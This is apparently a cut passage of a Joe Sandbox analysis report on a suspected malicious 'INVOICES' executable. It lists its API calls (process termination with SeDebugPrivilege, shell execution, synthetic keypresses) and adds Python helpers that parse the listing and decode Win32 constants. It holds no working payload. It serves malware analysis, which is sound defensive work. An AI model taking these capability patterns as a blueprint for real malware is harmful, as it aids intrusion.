                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                  • API String ID: 3648134473-3128320259
                                                                                                                                  • Opcode ID: aef4af5ccfb7aa53ef19753ff6949b202dc86e8aadca8addcd8320cbfba7aa5c
                                                                                                                                  • Instruction ID: cba13b2cd3c3fc998d8915c869007196ebfc084b95b59ad1bb66ca1c911530a1
                                                                                                                                  • Opcode Fuzzy Hash: aef4af5ccfb7aa53ef19753ff6949b202dc86e8aadca8addcd8320cbfba7aa5c
                                                                                                                                  • Instruction Fuzzy Hash: E00162F290020CBFEB519BA4DD89FE6776CD708701F0046A5FB09E6051EA789E854B75
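Every record in this listing shares one layout: an APIs block (direct calls plus calls reached through a subcall function), an optional Strings block with xrefs, the memory-dump provenance, and the Similarity fields (API ID, String ID, fuzzy hashes). What follows is an added example, not code from Joe Sandbox or from this report, that parses that layout into records and tags a record with a capability label when its API set satisfies a rule. The two sample records are copied from this listing (the process-termination routine carrying the SeDebugPrivilege string, and the _wprintf/MessageBoxW routine with its format string); the record and field names, the "Download File" cleanup and the rule labels are my own, and the parser assumes only the text layout as it appears on this page, not Joe Sandbox's native export format.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample in the layout of this report's function listing: two records
# copied from the page (process-termination routine, then the _wprintf/MessageBoxW one).
SAMPLE = """\
APIs
  • Part of subcall function 00793C99: CreateToolhelp32Snapshot.KERNEL32 ref: 00793CBE
  • Part of subcall function 00793C99: Process32FirstW.KERNEL32(00000000,?), ref: 00793CCC
  • Part of subcall function 00793C99: CloseHandle.KERNEL32(00000000), ref: 00793D96
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 007AEAB8
• GetLastError.KERNEL32 ref: 007AEACB
• TerminateProcess.KERNEL32(00000000,00000000), ref: 007AEB77
• CloseHandle.KERNEL32(00000000), ref: 007AEBB7
Strings
Memory Dump Source
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• Instruction Fuzzy Hash: 9841BD71200201DFDB14EF28CC99F6DB7A5AF84714F088558F9469F2D2CBBDA804CB96
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00794353
• LoadStringW.USER32(00000000), ref: 0079435A
• _wprintf.LIBCMT ref: 0079439D
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 007943BB
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00794398
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<name>[\w:@]+)\.(?P<module>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
STRING_RE = re.compile(r"^•\s*(?P<text>.*?),\s*xrefs:\s*(?P<xrefs>[0-9A-F]+)$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")
LINK_RESIDUE = "Download File"  # link text the HTML export glues onto dump-file names


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int
    caller: Optional[str] = None  # address of the subcall function for indirect calls


@dataclass
class Record:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, int]] = field(default_factory=list)  # (text, xref address)
    fields: dict[str, str] = field(default_factory=dict)

    @property
    def string_id(self) -> str:
        return self.fields.get("String ID", "")


def parse_records(text: str) -> list[Record]:
    """Split the listing into records; each record opens with an 'APIs' header."""
    records: list[Record] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            section = line
            if line == "APIs":
                records.append(Record())
            continue
        if not line or not records:
            continue
        rec = records[-1]
        if section == "APIs" and (m := API_RE.match(line)):
            args = m["args"].split(",") if m["args"] else []
            rec.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), m["caller"]))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            rec.strings.append((m["text"], int(m["xrefs"], 16)))
        elif section not in ("APIs", "Strings") and (m := FIELD_RE.match(line)):
            value = m["value"]
            if value.endswith(LINK_RESIDUE):
                value = value[: -len(LINK_RESIDUE)]
            rec.fields[m["key"]] = value.strip()
    return records


def api_names(rec: Record, include_subcalls: bool = True) -> set[str]:
    """Names of the APIs a record reaches, optionally restricted to its own direct calls."""
    return {c.name for c in rec.apis if include_subcalls or c.caller is None}


# Illustrative rules with my own labels: a record earns a label when its API set
# contains every name the rule lists.
CAPABILITY_RULES = {
    "enumerates and terminates processes": {"CreateToolhelp32Snapshot", "OpenProcess", "TerminateProcess"},
    "formats text into a message box": {"_wprintf", "MessageBoxW"},
}


def capabilities(rec: Record) -> list[str]:
    names = api_names(rec)
    return [label for label, needed in CAPABILITY_RULES.items() if needed <= names]


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(sorted(api_names(rec)), repr(rec.string_id), capabilities(rec))
```

Subcall entries keep their caller address, so a rule can be scoped to a function's own calls with include_subcalls=False; with the default the process-termination record matches because CreateToolhelp32Snapshot is only reached through the subcall at 00793C99. The String ID field is kept verbatim, so a rule can also key on it (SeDebugPrivilege next to TerminateProcess is the detail a reviewer of this record would want to see together).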
                                                                                                                                  APIs
                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0076C347,00000004,00000000,00000000,00000000), ref: 00732ACF
                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0076C347,00000004,00000000,00000000,00000000,000000FF), ref: 00732B17
                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0076C347,00000004,00000000,00000000,00000000), ref: 0076C39A
                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0076C347,00000004,00000000,00000000,00000000), ref: 0076C406
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ShowWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1268545403-0
                                                                                                                                  • Opcode ID: f18392c7a9a87a0e02e6aa797c420c63e8215ac0ad6101e61e53454e468962a5
                                                                                                                                  • Instruction ID: a715b1a94682975318612ea9e02bdfd6d53910f3349dba2eeb9e968e719336df
                                                                                                                                  • Opcode Fuzzy Hash: f18392c7a9a87a0e02e6aa797c420c63e8215ac0ad6101e61e53454e468962a5
                                                                                                                                  • Instruction Fuzzy Hash: 5A41DA30204780ABE7369B29DC8CB7B7BD6BB45310F58C91DE98786663C67DA843D711
                                                                                                                                  APIs
                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00797186
                                                                                                                                    • Part of subcall function 00750F36: std::exception::exception.LIBCMT ref: 00750F6C
                                                                                                                                    • Part of subcall function 00750F36: __CxxThrowException@8.LIBCMT ref: 00750F81
                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007971BD
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 007971D9
                                                                                                                                  • _memmove.LIBCMT ref: 00797227
                                                                                                                                  • _memmove.LIBCMT ref: 00797244
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 00797253
                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00797268
                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00797287
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 256516436-0
                                                                                                                                  • Opcode ID: 92dae3c6ac3523d913351e0195b10dc18e7ed07776ba9332f3a13263b857cc28
                                                                                                                                  • Instruction ID: 27eda28f68c5758974ff084e2f2888ee93fec54d68737cdde0728ce1a785ba3c
                                                                                                                                  • Opcode Fuzzy Hash: 92dae3c6ac3523d913351e0195b10dc18e7ed07776ba9332f3a13263b857cc28
                                                                                                                                  • Instruction Fuzzy Hash: BA316D32904209EBCF109F64DC89EAE7778FF45711F1481A5FD04AB286DB789E15CBA4
                                                                                                                                  APIs
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 007B621D
                                                                                                                                  • GetDC.USER32(00000000), ref: 007B6225
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007B6230
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 007B623C
                                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007B6278
                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007B6289
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007B905C,?,?,000000FF,00000000,?,000000FF,?), ref: 007B62C3
                                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007B62E3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3864802216-0
                                                                                                                                  • Opcode ID: eec9e9cbad8d345c7a0d2e441e2180c44986a50ea89acded97d12d2e61db5530
                                                                                                                                  • Instruction ID: 3de0df963d2a1d88237a70360a088e23dbbc0a8015b3d7952899e156793c6bd4
                                                                                                                                  • Opcode Fuzzy Hash: eec9e9cbad8d345c7a0d2e441e2180c44986a50ea89acded97d12d2e61db5530
                                                                                                                                  • Instruction Fuzzy Hash: 5A314F76201214BFEB118F54DC4AFEA3BA9FF09755F044165FE089A291C6799C41CB64
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 456cdd9f9c35fccee61c7c0c26d5113ac153f29af98fc7e155a7567c1f4abec3
• Instruction ID: 342ee31cda4e25724779ebd97bc8a8e6b175e723d82899627e6ec65a41b7dc50
• Opcode Fuzzy Hash: 456cdd9f9c35fccee61c7c0c26d5113ac153f29af98fc7e155a7567c1f4abec3
• Instruction Fuzzy Hash: D6714931900149EFDB04DF98CC89EAEBB79FF85310F54C159F915AB252C738AA51CBA4
APIs
• IsWindow.USER32(010C49E0), ref: 007BB41F
• IsWindowEnabled.USER32(010C49E0), ref: 007BB42B
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 007BB50F
• SendMessageW.USER32(010C49E0,000000B0,?,?), ref: 007BB546
• IsDlgButtonChecked.USER32(?,?), ref: 007BB583
• GetWindowLongW.USER32(010C49E0,000000EC), ref: 007BB5A5
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007BB5BD
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
• Opcode ID: 00ad6f1904da6af758d391032f7f556f54c616fc54a3c627a00a9057681d69df
• Instruction ID: d8e468b29ffb75020984308ad4a1faab4e2fccb97900942a483fffc0fde0d251
• Opcode Fuzzy Hash: 00ad6f1904da6af758d391032f7f556f54c616fc54a3c627a00a9057681d69df
• Instruction Fuzzy Hash: 0B718D34601644EFDB249F64C894FFABBB9FF09300F548069EE55972A2C7B9AD51CB20
APIs
• _memset.LIBCMT ref: 007AF55C
• _memset.LIBCMT ref: 007AF625
• ShellExecuteExW.SHELL32(?), ref: 007AF66A
  • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
  • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
  • Part of subcall function 0074FE06: _wcscpy.LIBCMT ref: 0074FE29
• GetProcessId.KERNEL32(00000000), ref: 007AF6E1
• CloseHandle.KERNEL32(00000000), ref: 007AF710
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 3522835683-2766056989
• Opcode ID: 34b8307cab5be5fb542e544bf916de005dbe739a778b8e8817494afad6a78085
• Instruction ID: a899ff91e11e1189b21940f4d7a086d690ff2a38e9863a122f092c53ae0ee771
• Opcode Fuzzy Hash: 34b8307cab5be5fb542e544bf916de005dbe739a778b8e8817494afad6a78085
• Instruction Fuzzy Hash: D961C275A00619DFCF14EF94C8859ADBBF4FF89310F148169E845AB362CB38AD41CB94
APIs
• GetParent.USER32(?), ref: 007912BD
• GetKeyboardState.USER32(?), ref: 007912D2
• SetKeyboardState.USER32(?), ref: 00791333
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00791361
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00791380
• PostMessageW.USER32(?,00000101,00000012,?), ref: 007913C6
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 007913E9
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: ec4a5abc017da0447160f050412ffc42e2bb4257bbda507e355415cbda183960
• Instruction ID: 1225c0d74d8484777f209da851f78cb442afec6c0902104f9d40f215b600e54d
• Opcode Fuzzy Hash: ec4a5abc017da0447160f050412ffc42e2bb4257bbda507e355415cbda183960
• Instruction Fuzzy Hash: 8151D3A0A047D77EFF3647349C4ABBA7EA96F06704F888589E0D5468D2C2DCACA4D750
APIs
• GetParent.USER32(00000000), ref: 007910D6
• GetKeyboardState.USER32(?), ref: 007910EB
• SetKeyboardState.USER32(?), ref: 0079114C
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00791178
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00791195
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007911D9
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007911FA
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 2ac316fb2de085d29b4d4f33f8a58e56f232ce7f2de06254f75a91f6d2a48a8a
• Instruction ID: e7ec9e4e1a13a850fe725b8ae0e16165d6210b4d9844c78eb6de897386b66461
• Opcode Fuzzy Hash: 2ac316fb2de085d29b4d4f33f8a58e56f232ce7f2de06254f75a91f6d2a48a8a
• Instruction Fuzzy Hash: 7F5109A06447DB3DFF3687349C45BBA7FA96F06300F488589E1D54A8C2D29DECA8D750
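The two keyboard functions above (the one at 007912BD and the one at 007910D6) only read clearly once the raw constants are named: message 00000100 is WM_KEYDOWN and 00000101 is WM_KEYUP, and the wParam values 00000010, 00000011, 00000012 and 0000005B are VK_SHIFT, VK_CONTROL, VK_MENU (Alt) and VK_LWIN. Each function therefore reads the keyboard state, rewrites it, and posts a synthetic press (or release) of the four modifier keys to the parent window. The Python decoder below is an added example for reading such Joe Sandbox "APIs" listings; it is not code from the report, from Joe Sandbox or from the sample. The constant tables hold the public Win32 header values for numbers that occur on this page, the sample listings are copied verbatim from the report, and reading the sequence as keystroke synthesis is the editor's interpretation (a routine of this shape is what a compiled AutoIt script's Send() runtime contains, which the report's AutoIt signature makes plausible, but the report itself does not state it).

```python
"""Decode the Win32 constants in Joe Sandbox "APIs" listings.

Added example, not code from the report or from the analysed sample. The
sample listings below are copied from the report; the constant tables are
the public winuser.h / wingdi.h values for the numbers that occur in them.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

WM_MESSAGES = {
    0x0030: "WM_SETFONT",
    0x00A1: "WM_NCLBUTTONDOWN",
    0x00B0: "EM_GETSEL",
    0x0100: "WM_KEYDOWN",
    0x0101: "WM_KEYUP",
}
VIRTUAL_KEYS = {
    0x01: "VK_LBUTTON",
    0x02: "VK_RBUTTON",
    0x10: "VK_SHIFT",
    0x11: "VK_CONTROL",
    0x12: "VK_MENU",  # Alt
    0x5B: "VK_LWIN",
}
DEVICE_CAPS = {0x5A: "LOGPIXELSY"}
MODIFIERS = {"VK_SHIFT", "VK_CONTROL", "VK_MENU", "VK_LWIN"}

# "• Api.MODULE(arg,arg), ref: 0040ABCD" or
# "• Part of subcall function 0040AAAA: _memset.LIBCMT ref: 0040ABCD"
LINE_RE = re.compile(
    r"(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)

# Listing of the WM_KEYDOWN function at 007910D6, copied from the report.
SAMPLE_KEYDOWN = """\
• GetParent.USER32(00000000), ref: 007910D6
• GetKeyboardState.USER32(?), ref: 007910EB
• SetKeyboardState.USER32(?), ref: 0079114C
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00791178
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00791195
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007911D9
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007911FA
"""

# Part of the font/control setup function at 007B6225, copied from the report.
SAMPLE_GUI = """\
• GetDC.USER32(00000000), ref: 007B6225
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 007B6230
• ReleaseDC.USER32(00000000,00000000), ref: 007B623C
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007B6289
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007B62E3
"""


@dataclass
class Call:
    api: str
    module: str
    args: List[str]          # raw argument strings, "?" where the sandbox could not resolve one
    ref: str
    subcall: Optional[str] = None
    decoded: List[str] = field(default_factory=list)


def _hex(arg: str) -> Optional[int]:
    return int(arg, 16) if re.fullmatch(r"[0-9A-F]{8}", arg) else None


def decode_call(call: Call) -> Call:
    """Name the constants the API is known to take; unknown values stay as raw hex."""
    a = call.args
    if call.api in ("SendMessageW", "PostMessageW") and len(a) >= 2:
        name = WM_MESSAGES.get(_hex(a[1]))
        if name:
            call.decoded.append(name)
            if name in ("WM_KEYDOWN", "WM_KEYUP") and len(a) >= 3:
                call.decoded.append(VIRTUAL_KEYS.get(_hex(a[2]), a[2]))  # wParam = virtual key
            elif name == "WM_NCLBUTTONDOWN" and len(a) >= 3 and _hex(a[2]) == 2:
                call.decoded.append("HTCAPTION")                         # wParam = hit-test code
    elif call.api == "GetAsyncKeyState" and a:
        call.decoded.append(VIRTUAL_KEYS.get(_hex(a[0]), a[0]))
    elif call.api == "GetDeviceCaps" and len(a) >= 2:
        call.decoded.append(DEVICE_CAPS.get(_hex(a[1]), a[1]))
    return call


def parse_listing(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # section headers such as "APIs" / "Strings"
        args = [s.strip() for s in m["args"].split(",")] if m["args"] else []
        calls.append(decode_call(Call(m["api"], m["module"], args, m["ref"], m["sub"])))
    return calls


def synthesized_modifiers(calls: List[Call]) -> set:
    """Modifier keys posted as WM_KEYDOWN/WM_KEYUP in a function that also reads and
    rewrites the keyboard state; empty if the listing does not show that pattern."""
    apis = {c.api for c in calls}
    if not {"GetKeyboardState", "SetKeyboardState"} <= apis:
        return set()
    return {d for c in calls if c.api == "PostMessageW" for d in c.decoded if d in MODIFIERS}


def describe(calls: List[Call]) -> List[str]:
    """One annotated line per call, e.g. 'PostMessageW [WM_KEYDOWN VK_SHIFT] @ 00791178'."""
    return [f"{c.api} [{' '.join(c.decoded)}] @ {c.ref}" if c.decoded else f"{c.api} @ {c.ref}"
            for c in calls]


if __name__ == "__main__":
    for text in (SAMPLE_KEYDOWN, SAMPLE_GUI):
        calls = parse_listing(text)
        print("\n".join(describe(calls)))
        print("synthesized modifiers:", sorted(synthesized_modifiers(calls)) or "none", "\n")
```

Running the file prints the annotated listings; any value the tables do not cover is left as raw hex (the 00000142 message in the font function, for instance), so extend WM_MESSAGES and VIRTUAL_KEYS as further functions on the page are read. The subcall lines ("Part of subcall function ...") are parsed too and keep their parent address in `subcall`.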
APIs
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
• API String ID: 2945705084-0
• Opcode ID: b0fa3f0cdccce35807e0ab4ceac9d5c12d58360f0dc79f6cabb010aafe2230d3
• Instruction ID: 841d4a0a397fd8b78487cdb3d3fb0b224700e65c928fdb5c2fd2fce68fd2b29f
